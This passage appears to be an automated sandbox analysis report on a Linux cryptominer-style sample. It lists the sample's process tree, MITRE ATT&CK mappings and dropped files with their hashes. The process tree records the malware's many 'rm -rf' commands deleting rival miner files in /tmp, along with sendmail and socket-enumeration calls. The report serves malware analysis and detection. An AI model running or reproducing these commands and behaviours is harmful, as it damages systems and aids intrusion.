- /bin/rm
  rm -rf /tmp/p2.conf
  2⤵
  PID:1812
- /bin/rm
  rm -rf /tmp/pprt
  2⤵
  PID:1813
- /bin/rm
  rm -rf /tmp/ppol
  2⤵
  PID:1814
- /bin/rm
  rm -rf /tmp/javax/config.sh
  2⤵
  PID:1815
- /bin/rm
  rm -rf /tmp/javax/sshd2
  2⤵
  PID:1816
- /bin/rm
  rm -rf /tmp/.profile
  2⤵
  PID:1817
- /bin/rm
  rm -rf /tmp/1.so
  2⤵
  PID:1818
- /bin/rm
  rm -rf /tmp/kworkerds
  2⤵
  PID:1819
- /bin/rm
  rm -rf /tmp/kworkerds3
  2⤵
  PID:1820
- /bin/rm
  rm -rf /tmp/kworkerdssx
  2⤵
  PID:1821
- /bin/rm
  rm -rf /tmp/xd.json
  2⤵
  PID:1822
- /bin/rm
  rm -rf /tmp/syslogd
  2⤵
  PID:1823
- /bin/rm
  rm -rf /tmp/syslogdb
  2⤵
  PID:1824
- /bin/rm
  rm -rf /tmp/65ccEJ7
  2⤵
  PID:1825
- /bin/rm
  rm -rf /tmp/jmxx
  2⤵
  PID:1826
- /bin/rm
  rm -rf /tmp/2Ne80nA
  2⤵
  PID:1827
- /bin/rm
  rm -rf /tmp/dl
  2⤵
  PID:1828
- /bin/rm
  rm -rf /tmp/ddg
  2⤵
  PID:1829
- /bin/rm
  rm -rf /tmp/systemxlv
  2⤵
  PID:1830
- /bin/rm
  rm -rf /tmp/systemctI
  2⤵
  PID:1831
- /bin/rm
  rm -rf /tmp/.abc
  2⤵
  PID:1832
- /bin/rm
  rm -rf /tmp/osw.hb
  2⤵
  PID:1833

/usr/sbin/sendmail
sendmail -t
1⤵
PID:744
- /usr/sbin/exim4
  /usr/sbin/exim4 -Mc 1rxaUM-0000C0-Qt
  2⤵
  - Reads CPU attributes
  PID:758

/usr/sbin/sendmail
sendmail -t
1⤵
PID:747
- /usr/sbin/exim4
  /usr/sbin/exim4 -Mc 1rxaUM-0000C3-R4
  2⤵
  PID:759

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:770

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:771

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/kdevtmpfsi

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/usr/bin/tntrecht

Filesize
14KB

MD5
5a1d285f538d224e075f75755302621b

SHA1
f9bd614b6995389aa4b2ea2a41233d5e0469212d

SHA256
08fa886f738c5da2a820b8cc4455653284eab614b5ff4fce24e9e6037e46c5e7

SHA512
b796178dec441b764f8187aacd1dc21812e50ac86430b2c59d46a814ca76259cbf1f9ba2ff547ebd84896370dbe65de2ea49997c88b457d8ff78461010c27e5e

Download Submit
/var/mail/user

Filesize
825B

MD5
7501e944a79b288bc9e00cb822d3e3e9

SHA1
8db84c354f26f023bb5b938c66b81ad60c25aaf2

SHA256
3de8bce67a1c1370a202999ad8aa8c201d3f0cc99762749c622c6b80805faf49

SHA512
0150fe38d82e36831ad821027f740400880172c0753534cf47848d005d08d4e068ab1450d7dca8056c1d9cdb6ab354934866a13592cdbf5825fa80d593523240

Download Submit
/var/mail/user

Filesize
1KB

MD5
9f0e5a9c248c2a77777abd42f26916f2

SHA1
7472e9e02d7f14b3c9d4607423c399252c82bfd6

SHA256
d9da234e839af380d8c8aad7d0935321cb71a8e0c3f6b5e0f782ca623050c229

SHA512
225537f37a92128d88a4bf4d2179f8ecde0824c98dc18b8230358c6a0fc85c0aea6c05cabb14fd38f6e5c8e6bba08aaf9d12e4aae7090a0784085b327319ef65

Download Submit
/var/mail/user

Filesize
2KB

MD5
02139615d11857673d8378e25f049fef

SHA1
7c440ed1060b55d4b4c8102b6004ead15cc54798

SHA256
706977e4d2de1242e415baa84ecca8de6fab2254d052091830f7c681f07e6815

SHA512
314cf82c892aab54bf20325e0731427d51a7f2ad76570e639620117b97390ebafd6f9f50247a86ebe2c160a931a99611fa2dd362fd7484d868724e4ceb1e2d7d

Download Submit
/var/mail/user

Filesize
3KB

MD5
049400cf628dc1f5df7ee66cd478cb89

SHA1
35ed16341ad2e880442f6fe70f88adb11c2c569f

SHA256
57663f843edc6d5a951588e6005e9b09197804cbf8cfabf22122bb72db0ab6f6

SHA512
a7fdd4d0a6611ca282fd7f57dd7cb06c23a6e0b9567df45230be5cb6f34a8c5e8971ea139893f49a732be35caf8372fdbe866c9bf33f714b07e7cbc0682ca1bb

Download Submit
/var/mail/user

Filesize
4KB

MD5
765b25a26702c27b5a5bf923ec3c76e3

SHA1
27e70764ca4764927e1faf3dcbc89a9a09c78a3f

SHA256
466e4f20317799954fce7c5fbfb88ca0d8d9232834ed96d6946b420a8fba65f7

SHA512
8eb571ed725a27ce94b858e672dab2585271e4e80d1eaa307fd5f28d317b24a7b3043f71437398b4a82630b002d95d37ae7d7c513b29020265991de91c8193af

Download Submit
/var/mail/user

Filesize
4KB

MD5
b68a17ce2e346fd82e861ecd6b281496

SHA1
417dae2ed77689c0157cc7dd492444cc5b756b1c

SHA256
6c94134c61f70291338b1498c155db40994d9002ad80ea221352127ff290865b

SHA512
5afb96073f92fe2b48b1ecb8ad5557762ec839e39f6229037195d30a7470e629db77e802ad6f483bf7354df5f6e14d0b8bc6e28ac6325f0f0bee4a9f72ec7422

Download Submit
/var/spool/exim4/input/1rxaUM-0000C0-Qt-D

Filesize
128B

MD5
71066204ac4edf1a2542b851f4c65712

SHA1
f2bfa3b3a66bacd3f0fa40892e676e862378faf1

SHA256
07da6a283b3ab4f360b213034f8e3bd21dc889de12c667f28187cfd8a0f0b9f2

SHA512
2e52b767ebc9e22d229f9fcbc29b4cf10db8eef786c2a6ff672afcc5b3bb963a1dcf2ae33273c28724f387096e495c984641b5616b27eee25181d47b1eabfad4

Download Submit
/var/spool/exim4/input/1rxaUM-0000C0-Qt-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/1rxaUM-0000C3-R4-D

Filesize
146B

MD5
6809b896c9d298dc6695dd2ac4a2ea0f

SHA1
a4e1d67020873273edbffdcb2d786f165c8147f1

SHA256
7f8db5f3d74ef10654919a1072b4fba5980bb638467034d4705a4265f3400f88

SHA512
c577bf2c2d012fcca8f7bc5cb148346de15384f067bf92b0631762ca16bf8b2a92abf15fd70feb458f2a34293d8c3742073b77556433adfd93cbfd97412732b4

Download Submit
/var/spool/exim4/input/1rxaVy-0000bB-Az-D

Filesize
128B

MD5
22de269bec7da545a109352f60adc21d

SHA1
149ecd1cce953d8268f233a51e78274075dcf370

SHA256
53f653e3f3b823ed4f5185c4a170b60bb5d16f031455bd93628e1c809e1fa6a2

SHA512
488255b6d2ede57af8a8e424d3c95b2a6a0a2c7a4f90de8d202dae0db47d879fdce151abca8d46961b06252c3aa3bb12c75bff10ce1e066f4503eb52dcfe4823

Download Submit
/var/spool/exim4/input/1rxaVy-0000bE-Ce-D

Filesize
146B

MD5
d7d419733ab729646b58ab84bc6e6349

SHA1
e9a550a1b8054bc3d0999b78bc6dc479529ff43c

SHA256
92f1b7f78cfdff60c038a158f8c99510f1594e729fd951531bcdac9813c5e559

SHA512
7f923f8b10903ba0e2997713fae7f2d83acb973409df71097c866fd1fd50d775ea537f4fe0452704a3eeb906e06f7039f0c3163a62e5068cc7672d1f985b4b7a

Download Submit
/var/spool/exim4/input/1rxaVz-0000bJ-CC-D

Filesize
128B

MD5
16fa57880085939d8c83e1de9c47a43c

SHA1
ab844a1d5980a573c19491a3dc3b8a0c003a7be8

SHA256
1c5d8b83548631143afe7624ae7ee67c119b459a90d925c487a9e2893cd9dfe5

SHA512
28402aab05b6372c9956d5808b222fa9c0b94b9994df40ff5a9a68d9bd733a3291d933cd287365aa9bbdd20083b153396988d94b1847bb1393d24f240e057f5f

Download Submit
/var/spool/exim4/input/1rxaVz-0000bM-Of-D

Filesize
146B

MD5
5b9247c130e65bafd08ace55bf21fe25

SHA1
a7e843b1d735b10ed66ece20f21ec88df7a89fa4

SHA256
7d7587b8529d5d00a06c317c026768bcf25d284dcd522349c12fb400704a3efd

SHA512
2ea4954c5963735841fe62407f65cb9f15bdd59a9fad01de62896aaec37be30f96a60b4bd85d3699e4dead2006f6363ff40064f5a9ae20246c672d214babe2f4

Download Submit
/var/spool/exim4/input/hdr.2305

Filesize
915B

MD5
8f4fbf104845aa82eab9cb4381c08c4f

SHA1
3f1f55e41dd3bca1a0779231e50116ae7f2e575e

SHA256
f880d1f7306eb5ee2c68e28e0c07c2b83939284f2be1195a4bd46bc5d4f7911a

SHA512
9e3b6956d54d2b08fc3dcbf6474544b4b9fff26f110e5dc04498cf2d663cd019469d870ff407c1f58cccef0ffa4345aa902c02d91d26c0c6a84e1d2e01b601ea

Download Submit
/var/spool/exim4/input/hdr.2308

Filesize
915B

MD5
790e9fbe3541a597f8c2efe06b336a13

SHA1
9b52a64a8cd1e170da87ae919b1b318933f2c2aa

SHA256
50da7c07f6ff6154958c5e78875ef27b868e37fa32cdd988ffd3af49a4366be5

SHA512
83989366020c0dd9a68141f70be9fd1da15082855ea617cbce68f88d5cac88c5d25d17334f2546bb64da4978388226632dab919874aa0980e1349ec73e5aceed

Download Submit
/var/spool/exim4/input/hdr.2313

Filesize
915B

MD5
375e295aa1f348dba104eb7c7d0c445f

SHA1
45fd7126fb1a75680de059f9dc741686b4a809ed

SHA256
da1782738a0c7d06573e99aad0a8dd1129daa760df47e19be20956db86a9f297

SHA512
90ee4f678a70e6c6729d7b62abb31a1adf360d2caaaac5f439b993098e3a1e02992dd70261f7196a4acc571807d6363bfe59df0ff81bb063c523a14b6a3d8458

Download Submit
/var/spool/exim4/input/hdr.2316

Filesize
915B

MD5
522ecc37b53221ced2be4640ef39fe9d

SHA1
d6fff86f895ed5da5781e3be795be25a91cbe243

SHA256
5c661d564adc38d834e87507b1fd69e4e4d459c9f4c861716309a9ad709f2764

SHA512
2b7439e174ddd18062bdb7c799d3a4f514800740cd2f603772caa9f0e47123c354c71312df553bd2dcdff036d7294fbc1ef54fe1b723c2b8e5501c4b123a52c0

Download Submit
/var/spool/exim4/input/hdr.747

Filesize
915B

MD5
74583c3cce27fb3f4740aa10a094ce6d

SHA1
3c0c8fe73c710917df7431314f01a597d6697f53

SHA256
039aedfae067822c48239075b86807f15af5f4986e49cf914f4725057d7d2318

SHA512
8212d5a86eb4e2928018efdea76ed6d5f2e68c98990ee5609ef12143365fafd878b8efae1981192fef5e33f94cc7056a1c578e621bfa6ac298e955a2f3352c14

Download Submit
/var/spool/exim4/msglog/1rxaUM-0000C0-Qt

Filesize
288B

MD5
c64b0bda29199e12c51efa73bf8b0fb3

SHA1
f0b615021b944b24368e0307165f4bf18da9cf81

SHA256
ae6f6dcade0bcdae698d30540efb0799c36573d25840415952c98a10823ea3db

SHA512
224ef000aa44a3231d583214ce46283a7279df399f17c280e91235a8b553456de243b504a1758e76dd4521f163ac1676d68d824df9b6fdc5297c08aa7b280c40

Download Submit
/var/spool/exim4/msglog/1rxaUM-0000C0-Qt

Filesize
89B

MD5
1004b912074b80a0153f296a89a596b4

SHA1
eb89b1321d8d7eeded5c80a3d514aef72a4ca81e

SHA256
13a04958c17ed9ffa536e951a81674a470caa5b6c5f33e7036cbc97be7ad4d9f

SHA512
8c583fdaa1c0f85f523acf2e0cc00f6c93d3156bf441af67b8d1ad57a02fc103afc5af4b7852488b5fe4ae2311ad86dfc4e0c7da5d8f67c0d09042fc550f99d6

Download Submit
/var/spool/exim4/msglog/1rxaUM-0000C3-R4

Filesize
288B

MD5
05434f048194f39d522fe32d238ab86f

SHA1
3adb10ec252e324eca82b261dc100d5cbb84dceb

SHA256
190912abd6eb76f2585819f08f7b5abdbe39208b037a6c22fb3eec23b176cd43

SHA512
7ea17aec200e0f4dca53476ac985fa3f4eaf185d8a45b55b6a554688ce988358200de1cc426dd877e46313c5e969524e35865c0c8f1216c790d003cc33729809

Download Submit
/var/spool/exim4/msglog/1rxaUM-0000C3-R4

Filesize
89B

MD5
df1ba66713914350706d82cb9bb99761

SHA1
1b8d4ddbe12f765d807ccec31a392468a9196b65

SHA256
155c5c66b7014a5099e899a7ed0c432c0dfe13d7235c1472851146c9b002a919

SHA512
825cb1c0cec386c6296ba7ae854ffff7c60cdc8234f87862c6930cc76c549c0039e2003c002e57c0a09230959563d01e9a9cc3df7ec097cc8ec118f7dd53c61f

Download Submit
/var/spool/exim4/msglog/1rxaVy-0000bB-Az

Filesize
89B

MD5
538be75b8cee486487111bf129285a21

SHA1
f3942701e2b332cd99527d4928fe43d82bcd4313

SHA256
549a52f19dfc57fc11328b31822cfb92fdea7e10f2d1204602c2cc7006da4a79

SHA512
1ea3fb623809b59578611d57f3a9ae60a0f916b615999c79dad8aab5a51e8c989560646d5054c56b18b1b15f74cfa783d7568ee0c7323198048aabbe57a517b1

Download Submit
/var/spool/exim4/msglog/1rxaVy-0000bB-Az

Filesize
288B

MD5
0929d5285ce466ca6482307730b4b0f1

SHA1
2bac7f54a8e4d43814ae81bdd2640dc24b3714b6

SHA256
e102657fef28a9535d1abd3a64f932fdc4f8a38761b59b0eacba86c5c8c0b2af

SHA512
3b6347bb061ae2e775ab5e73436c3400845f8d75e1f3fa7de3821d11f0139e51f8d9b723373a2cb9b028ca1a6868978ca7798b9c3aa1e5c000c54077c3996701

Download Submit
/var/spool/exim4/msglog/1rxaVy-0000bE-Ce

Filesize
89B

MD5
02d4d6dc9aef01c5f1b48022d65eb37d

SHA1
b614c3435f8932710b1871cee87bd9ee05d32225

SHA256
2ec7033ec9a8cbcee22e4749228765fb8e7f4f4500087eb16f05c336792b4467

SHA512
2eed97fdd3ed38f73a0cedc01b05ca7ac646d5abfe01f0335946d2b79a7ce0ee6b5694a0594ffb995b505a96c09f640bdf2650f1183a4f4556caacbd0108393e

Download Submit
/var/spool/exim4/msglog/1rxaVy-0000bE-Ce

Filesize
288B

MD5
fe0f780670877d6fe523d2078ddd8e67

SHA1
c599437d778cc4a70c141004bc91a6207cab3014

SHA256
831b101be917573bb5b88f21bc5b075b04417f16274473c67db796dd7ae3a380

SHA512
ab5663be4aa951ceedbb02a3b9e0c5f9ad80dfc6755e95299eb4966f4eed4e6671111c5307a98e9df3c7288cc7920c0ef223cdfea371363c39f00ef8381e21ad

Download Submit
/var/spool/exim4/msglog/1rxaVz-0000bJ-CC

Filesize
89B

MD5
c811a06db6d99d3060b9959166aa2e8f

SHA1
e0d47cdfb9c2e74dfebaed75250efd6c1efe0481

SHA256
8fbd7a34cf24ac7008caae8f85191e5be4b51adbeddbc33cd0d302af50f91c3e

SHA512
1c6a795bb3990da51b5f2b5edcfb6eb5a09e1456b7ffdc7f518025993cc929aa5d3a5d92e42fe3e5b420a65fa1a95cf1faf1c5db58a88850776d721d6eaddf9d

Download Submit
/var/spool/exim4/msglog/1rxaVz-0000bJ-CC

Filesize
288B

MD5
af6108cb034a88fcbc7ec66215c833d2

SHA1
d39df6213a2f2ff88abecbfdc8d53868ee6ca838

SHA256
020af3504bc759511a49d26524293fd12f7b3ff0108ad746463099866045be77

SHA512
82401dbbe0964533b9e352b49f47e1cbec10e1bdc8a9de5e28f85ccc4ee96a6bf36d3b3fba4183ab38ed14439426e2de595ae46f0456191f20ac288b933ee291

Download Submit
/var/spool/exim4/msglog/1rxaVz-0000bM-Of

Filesize
89B

MD5
f8b47ac8cb1e81ffd5d1b89e3f8b9b38

SHA1
289ab8eb8b8a3e0983cf1afd66fa5f48a273b5a8

SHA256
012a7e9b572011736e06fab8b1c88052316f6a867a7d6474536d21c5d6db83b6

SHA512
a08928bf0a71cdb70ec61f3d9d4486f051f8eddeef02e99095375469acf191331a679d7e6fb0fa52bdfaf096c648f9873f636bd3ead63288b7804fa942e2c948

Download Submit
/var/spool/exim4/msglog/1rxaVz-0000bM-Of

Filesize
288B

MD5
0f53c09be46a3caa8f7b01402a402b82

SHA1
d1499b653c4d57eda359dbe1c4f07cd63e799cbe

SHA256
2efb83c30864d021b6cfeda9a3b8a295a6204e5335432de056bd5235790883e5

SHA512
9513babc215426d1846a760a7a8f8729681d826a39870621dacfd181fab2c07820726fd12b42cbed27067b71ba9368262b042b84e6b525c3eaa10e7a15d8f84b

Download Submit
memory/2364-1-0x77339000-0x7734a060-memory.dmp

Download